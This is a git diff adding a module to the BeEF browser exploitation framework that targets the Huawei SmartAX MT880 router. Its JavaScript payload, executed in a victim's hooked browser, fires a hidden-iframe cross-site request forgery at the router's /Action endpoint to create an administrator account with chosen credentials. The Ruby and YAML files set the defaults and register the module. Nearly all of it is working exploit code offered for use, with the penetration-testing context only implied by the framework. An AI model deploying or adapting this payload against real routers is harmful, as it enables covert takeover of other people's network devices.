diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js new file mode 100644 index 000000000..a749117a8 --- /dev/null +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -0,0 +1,32 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var gateway = '<%= @base %>'; + var username = '<%= @username %>'; + var passwd = '<%= @password %>'; + + var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); + huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(huawei_smartax_mt880_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml new file mode 100644 index 000000000..0ccbe8c1d --- /dev/null +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + Huawei_smartax_mt880_csrf: + enable: true + category: ["Exploits","Router"] + name: "Huawei SmartAX MT880 CSRF" + description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb new file mode 100644 index 000000000..77f39ba20 --- /dev/null +++ b/modules/exploits/router/huawei_smartax_mt880/module.rb @@ -0,0 +1,30 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Huawei_smartax_mt880_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end